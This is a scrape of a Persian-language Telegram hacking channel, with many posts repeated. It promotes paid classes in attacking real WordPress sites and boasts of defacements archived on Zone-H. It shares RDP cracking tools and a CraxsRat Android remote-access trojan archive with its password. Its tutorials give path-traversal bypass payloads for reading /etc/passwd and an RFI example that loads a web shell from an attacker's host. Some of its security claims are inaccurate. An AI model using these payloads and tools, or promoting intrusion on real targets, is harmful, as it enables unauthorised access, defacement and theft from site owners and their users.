Connect_To_RDP_Program.zip
2.3 MB
برنامه های اتصال به RDP در ویندوز و اندروید :
Windows:
— Remote Desktop Connection 2003
این برنامه برای اتصال NoNLA به RDP استفاده میشه..
—RDP Multi Tool
این برنامه برای مدیریت تعداد زیادی از RDP ها استفاده میشه..
android:
—RD Client :
https://play.google.com/store/apps/details?id=com.microsoft.rdc.androidx
آموزش کرک RDP :
@MajesticHackers
—————
@LearnExploit
Windows:
— Remote Desktop Connection 2003
این برنامه برای اتصال NoNLA به RDP استفاده میشه..
—RDP Multi Tool
این برنامه برای مدیریت تعداد زیادی از RDP ها استفاده میشه..
android:
—RD Client :
https://play.google.com/store/apps/details?id=com.microsoft.rdc.androidx
آموزش کرک RDP :
@MajesticHackers
—————
@LearnExploit
👍6🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Xpath Injection -- Admin Bypass -- Shell Upload
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
🔥1
1.txt
261 B
👍2🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
Xpath Injection Admin Bypass
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
🔥3
Forwarded from Cyber Lab (KurtLar)
👑 VIP Channel 👑
😵🤔🙁😝😤☹️🙁☹️
ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد
فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره
دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت نام میکنین الان ثبت نام میکنیم
کانال vip وب هکینگ ما متفاوت با همه کانال ها هستش ترکیبی از کانال های vip خارجی و ایرانی چجوری ؟
اینطوری که هم توی کانال ابزار هم شل فایندر کرکر اکسپلویت و در کنار اینها اموزش های مربوط به وب هکینگ قرار داده میشه درواقع شما هم آموزش میبینید هم ابزار دارید
چیا توی کانال وب هکینگ هستش ؟
انواع کرکر
ابزار های مربوط به وب هکینگ
شل فایندر
اکسپلویت
و آموزش های مربوط به وب هکینگ که اینا نمونه اموزش های توی کانال vip وب هکینگ هستش 👇👇👇
t.me/KurtLar0101/489
t.me/KurtLar0101/311
t.me/KurtLar0101/313
t.me/KurtLar0101/315
t.me/KurtLar0101/316
t.me/KurtLar0101/317
t.me/KurtLar0101/330
نمونه ابزار هایی که توی کانال vip قرار داده شده :
t.me/KurtLar0101/377
t.me/KurtLar0101/393
قیمت ۷۱۰ تومان
برای تهیه vip پیام بدین :@Bvrce
😵🤔🙁😝😤☹️🙁☹️
ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد
فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره
دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت نام میکنین الان ثبت نام میکنیم
کانال vip وب هکینگ ما متفاوت با همه کانال ها هستش ترکیبی از کانال های vip خارجی و ایرانی چجوری ؟
اینطوری که هم توی کانال ابزار هم شل فایندر کرکر اکسپلویت و در کنار اینها اموزش های مربوط به وب هکینگ قرار داده میشه درواقع شما هم آموزش میبینید هم ابزار دارید
چیا توی کانال وب هکینگ هستش ؟
انواع کرکر
ابزار های مربوط به وب هکینگ
شل فایندر
اکسپلویت
و آموزش های مربوط به وب هکینگ که اینا نمونه اموزش های توی کانال vip وب هکینگ هستش 👇👇👇
t.me/KurtLar0101/489
t.me/KurtLar0101/311
t.me/KurtLar0101/313
t.me/KurtLar0101/315
t.me/KurtLar0101/316
t.me/KurtLar0101/317
t.me/KurtLar0101/330
نمونه ابزار هایی که توی کانال vip قرار داده شده :
t.me/KurtLar0101/377
t.me/KurtLar0101/393
قیمت ۷۱۰ تومان
برای تهیه vip پیام بدین :@Bvrce
🤬2😁1
Forwarded from Cyber Lab (KurtLar)
Cyber Lab (KurtLar)
👑 VIP Channel 👑 😵🤔🙁😝😤☹️🙁☹️ ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت…
و خب در ویدیو های آموزش سایت های واقعی رو مورد اتک و بررسی قرار میدیم درواقع تارگت داریم برای هر باگی و در دنیای واقعی شما میاید تارگت میزنید و ازمایشگاهی به این شکل نخواهیم داشت اگرم ازمایشگاه هم داشته باشیم برای دو سه تا باگ هست که اگه تارگت واقعی برای اونا پیدا نشه توی ازمایشگاه تست بکنیم
و اینکه سایت های وردپرسی رو مورد بررسی قرار میدیم اصلا توی اموزش یاد میدیم چجوری روی یا سایت وردپرسی شل اپلود کنیم هکش کنیم بیشتر تارگت های ما وردپرسیییی هستتد
بنده چندین سال در حوضه وب هکینگ فعالیت داشتم شما میتونید از طریق زون اچ کارای بنده رو مورد بررسی قرار بدین :
https://zone-h.org/archive/notifier=D4LGH4CK_TM
و اینکه سایت های وردپرسی رو مورد بررسی قرار میدیم اصلا توی اموزش یاد میدیم چجوری روی یا سایت وردپرسی شل اپلود کنیم هکش کنیم بیشتر تارگت های ما وردپرسیییی هستتد
بنده چندین سال در حوضه وب هکینگ فعالیت داشتم شما میتونید از طریق زون اچ کارای بنده رو مورد بررسی قرار بدین :
https://zone-h.org/archive/notifier=D4LGH4CK_TM
💔1
Cyber Lab (KurtLar)
👑 VIP Channel 👑 😵🤔🙁😝😤☹️🙁☹️ ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت…
قیمت کانال وی ای پی ۷۱۰ تومان است دوستانی که از طرف ما برن برای ثبت نام ۶۰۰ تومن هستش
درواقع ۱۱۰ تومن تخفیف
رفتید برای ثبت نام بگید از طرف ما اومدین ۱۱۰ تومن تخفیف بگیرین ❤️
برای ثبت نام به این ایدی پیام بدین : @Bvrce
درواقع ۱۱۰ تومن تخفیف
رفتید برای ثبت نام بگید از طرف ما اومدین ۱۱۰ تومن تخفیف بگیرین ❤️
برای ثبت نام به این ایدی پیام بدین : @Bvrce
💔1
Forwarded from Cyber Lab (KurtLar)
Linuxconsole😂😂😂😂😂
Mirror : https://zone-h.org/mirror/id/41210067
چن ماه پیش یکی از سایتای گنده جهانو زدیم لینوکس کنسول اره سیستم عامل لینوکس کنسولو دیفیس کردیم
خواستم بگم تو بحث وب هکینگ توی کانال vip توسط یه مدرسی تدریس میشه که چهارتا سایت درست حسابی زده حرفی برای گفتن داره
و خب قراره پاییزو بشینین دیفیس کنین اکسس بگیرین دیتابیس بزنین طعم واقعی وب هکینگ بچشین
اینکه سایتای وردپرسی چجوری هک میشن cms ها چجوری اکسپلویت میشن و.... قراره فله ای روی تارگتای واقعی مانور بدیم
زون اچ ما : https://zone-h.org/archive/notifier=D4LGH4CK_TM
برای ثبت نام تو کانال vip وب هکینگ به ایدی زیر پیام بدین 👇
@Bvrce
Mirror : https://zone-h.org/mirror/id/41210067
چن ماه پیش یکی از سایتای گنده جهانو زدیم لینوکس کنسول اره سیستم عامل لینوکس کنسولو دیفیس کردیم
خواستم بگم تو بحث وب هکینگ توی کانال vip توسط یه مدرسی تدریس میشه که چهارتا سایت درست حسابی زده حرفی برای گفتن داره
و خب قراره پاییزو بشینین دیفیس کنین اکسس بگیرین دیتابیس بزنین طعم واقعی وب هکینگ بچشین
اینکه سایتای وردپرسی چجوری هک میشن cms ها چجوری اکسپلویت میشن و.... قراره فله ای روی تارگتای واقعی مانور بدیم
زون اچ ما : https://zone-h.org/archive/notifier=D4LGH4CK_TM
برای ثبت نام تو کانال vip وب هکینگ به ایدی زیر پیام بدین 👇
@Bvrce
👏4👍1💔1
0Day.Today | Learn Exploit | Zero World | Dark web |
درمورد بایپس ها توی وب هکینگ صحبت کنیم ؟
درمورد بایپس توی حمله File path traversal :
من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله
اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd
خب اولین روش بایپس :
....//....//etc/passwd
دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم
سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd
چهارمین متود یا همون روش :
/image?filename=../../etc/passwd%00.jpg
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله
اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd
خب اولین روش بایپس :
....//....//etc/passwd
دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم
سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd
چهارمین متود یا همون روش :
/image?filename=../../etc/passwd%00.jpg
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤🔥2💔1
Forwarded from imem!
در حملات HTTP Smuggling کدام یک از انکودینگهای زیر بیشتر استفاده میشود؟
Anonymous Quiz
42%
Base64
28%
Chunked
23%
UTF-8
7%
Gzip
❤🔥1👍1
باگ xss چه باگیه :
باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم
باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه
کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...
باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم
خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت
ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن
و حمله csrf از زیرمجموعه های باگ xss هستش
و چندین نوع xss داریم :
Xss از نوع Reflected
معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه
Xss از نوع stored
خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد
حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه
و نوع دیگه ای از xss نوع Dom هستش
خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟
میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم
باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه
کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...
باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم
خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت
ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن
و حمله csrf از زیرمجموعه های باگ xss هستش
و چندین نوع xss داریم :
Xss از نوع Reflected
معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه
Xss از نوع stored
خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد
حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه
و نوع دیگه ای از xss نوع Dom هستش
خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟
میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤🔥5👍2💔1
🏃♂️ آموزش امنیت سایبری با حل چالش
✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time
https://t.me/challenginno
✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time
https://t.me/challenginno
باگ HTTP Smuggling چیه؟
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز میشد و پس از دریافت پاسخ، این اتصال بسته میشد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر میشد، به خصوص وقتی درخواستهای متعددی باید پشت سر هم به یک سرور ارسال میشد.
ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینهسازی اتصالها و کاهش بار شبکه شد:
انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال دادهها در پروتکل HTTP استفاده میشود و شامل انواع مختلفی است:
حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ میدهد که یک کلاینت (حملهکننده) از تفاوت نحوه پردازش درخواستها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بکاند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:
ویژگی Keep-Alive و Pipelining بین کلاینت و فرانتاند سرور برقرار است، اما بین فرانتاند و بکاند چنین نیست.
فرانتاند درخواستها را به بکاند ارسال میکند، اما بکاند نمیتواند درخواستها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواستها بین این دو سرور وجود دارد.
مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانتاند ارسال میکند. فرانتاند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بکاند ارسال کند.
بکاند که به درستی پارس میکند، این دو درخواست را جدا از هم میبیند و پاسخ اولین درخواست را به فرانتاند ارسال میکند.
فرانتاند این پاسخ را به کلاینت برمیگرداند، اما درخواست دوم که در بافر بکاند مانده، روی درخواست بعدی قرار میگیرد.
این باعث میشود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواستها بین سرورهای فرانتاند و بکاند، منجر به این حمله میشود و میتواند امنیت سرور و دادههای کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
✍ imem!
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز میشد و پس از دریافت پاسخ، این اتصال بسته میشد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر میشد، به خصوص وقتی درخواستهای متعددی باید پشت سر هم به یک سرور ارسال میشد.
ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینهسازی اتصالها و کاهش بار شبکه شد:
ویژگی Keep-Alive: این ویژگی اجازه میدهد که یک اتصال TCP پس از دریافت پاسخ بسته نشود و برای درخواستهای بعدی باز بماند. این قابلیت با هدر Connection: keep-alive پیادهسازی میشود. وقتی از Keep-Alive استفاده میشود، کلاینت میتواند چندین درخواست HTTP را بدون نیاز به باز و بسته کردن مداوم اتصالات TCP ارسال کند.
برای تست این قابلیت میتوان از دستور زیر استفاده کرد:curl --keepalive-time 10 http://theemi.ir/1 http://theemi.ir/2
این دستور به سرور میگوید که اتصال TCP را تا 10 ثانیه باز نگه دارد و سپس بسته شود.
ویژگی Pipelining: در این حالت، کلاینت میتواند چند درخواست HTTP را به صورت همزمان و پشت سر هم به یک اتصال ارسال کند، بدون اینکه منتظر دریافت پاسخ هر درخواست بماند. پاسخها نیز به ترتیب ارسال درخواستها از سرور دریافت میشوند.
برای تست این قابلیت:echo -en "GET /path1 HTTP/1.1\r\nHost: theemi.ir\r\n\r\nGET /path2 HTTP/1.1\r\nHost: theemi.ir\r\n\r\n" | nc theemi.ir 80
در اینجا از nc (Netcat) برای باز کردن یک اتصال TCP روی پورت 80 استفاده میشود و دو درخواست HTTP به صورت پیپلاین شده ارسال میگردند.
انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال دادهها در پروتکل HTTP استفاده میشود و شامل انواع مختلفی است:
chunkedمهمترین و پرکاربردترین آنها در این زمینه Chunked است. در انتقال chunked، دادهها به قطعات (چانکها) تقسیم شده و به سرور ارسال میشوند. هر چانک یک سایز مشخص دارد و با پایان هر چانک، سایز بعدی ارسال میشود. این روش معمولاً در ارسال دادههای آپلودی بزرگ استفاده میشود، به طوری که سرور بتواند بدون نیاز به دانستن اندازه کامل محتوا، دادهها را دریافت کند.
compress
deflate
gzip
identity
حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ میدهد که یک کلاینت (حملهکننده) از تفاوت نحوه پردازش درخواستها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بکاند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:
فرانتاند(Front-end server): سروری که مستقیماً به کلاینت سرویس میدهد..
بکاند(Back-end server): سروری که درخواستهای پردازششده را از فرانتاند دریافت میکند و پاسخ نهایی را به فرانتاند میدهد
ویژگی Keep-Alive و Pipelining بین کلاینت و فرانتاند سرور برقرار است، اما بین فرانتاند و بکاند چنین نیست.
فرانتاند درخواستها را به بکاند ارسال میکند، اما بکاند نمیتواند درخواستها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواستها بین این دو سرور وجود دارد.
مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانتاند ارسال میکند. فرانتاند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بکاند ارسال کند.
بکاند که به درستی پارس میکند، این دو درخواست را جدا از هم میبیند و پاسخ اولین درخواست را به فرانتاند ارسال میکند.
فرانتاند این پاسخ را به کلاینت برمیگرداند، اما درخواست دوم که در بافر بکاند مانده، روی درخواست بعدی قرار میگیرد.
این باعث میشود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواستها بین سرورهای فرانتاند و بکاند، منجر به این حمله میشود و میتواند امنیت سرور و دادههای کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
✍ imem!
❤🔥10👍4
درمورد باگ lfi و rfi و نحوه به وجود امدن این باگ ها و نحوه پچ کردنشون
Lfi مخفف شده :
Local file inclusion
باگ rfi مخفف شده :
Remote file inclusion
باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php
مثال خواندن فایل دیتابیس 👆👆
باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند
برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt
همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد
هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include
برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم
روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است
جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :
برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم
برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم
استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Lfi مخفف شده :
Local file inclusion
باگ rfi مخفف شده :
Remote file inclusion
باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php
مثال خواندن فایل دیتابیس 👆👆
باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند
برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt
همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد
هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include
برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم
روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است
جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :
برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم
برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم
استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍7💔2❤1🔥1
Sending client data to the robot with the help of PowerShell
GITHUB
#Tools———————
IR0Day.Today Bax
@LearnExploit
GITHUB
#Tools———————
IR0Day.Today Bax
@LearnExploit
Forwarded from imem!
CraxsRats v4.9.5.rar
198 MB
craxs rat v4.9.5
Password =>
Licence :
Join => @imexemi
Password =>
@imexemi
Licence :
Attackndroid
به هیچوجه روی سیستم اصلی و گوشی خودتون امتحان نکنید
Join => @imexemi
❤🔥4👍1😁1
باگ xss و csrf مثل هم هستند در باگ csrf هکر خود را به عنوان کاربر مجاز جعل میکند و سایت این را تشخیص نمیدهد و csrf ایجاد میشود
در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود
باگ csrf مخفف شده :
Cross site request forgery
است
بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند
باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است
پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است
بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود
باگ csrf مخفف شده :
Cross site request forgery
است
بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند
باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است
پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است
بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤2